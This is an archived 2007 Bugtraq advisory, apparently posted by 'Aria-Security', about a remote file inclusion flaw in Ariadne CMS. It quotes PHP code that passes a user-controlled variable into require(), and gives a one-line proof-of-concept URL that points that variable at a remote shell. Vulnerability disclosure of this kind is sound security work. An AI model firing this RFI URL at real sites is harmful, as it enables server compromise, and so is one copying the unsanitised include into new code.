Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




bugtraq logo Bugtraq mailing list archives

Ariadne CMS Remote File Inclusion
From: Advisory () Aria-security net
Date: 6 Aug 2007 21:41:32 -0000

_________________________

A R I A - S E C U R I T Y
_________________________

Ariadne CMS Remote File Inclusion
Vendor: http://www.ariadne-cms.org/


Source Code:


<?php
  require("./ariadne.inc");
  require($ariadne."/configs/ariadne.phtml");

  $PATH_INFO = $HTTP_SERVER_VARS["PATH_INFO"];
?>
<html>
<head>
  <script>
    function LoadingDone() {
parent.LoadingDone();
}


PoC:
http://site.com/path/view.php?ariadne=SHELL?





Credits: Aria-Security Team
http://Aria-Security.net
http://outlaw.aria-security.info


  By Date           By Thread  

Current thread:
  • Ariadne CMS Remote File Inclusion Advisory (Aug 06)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]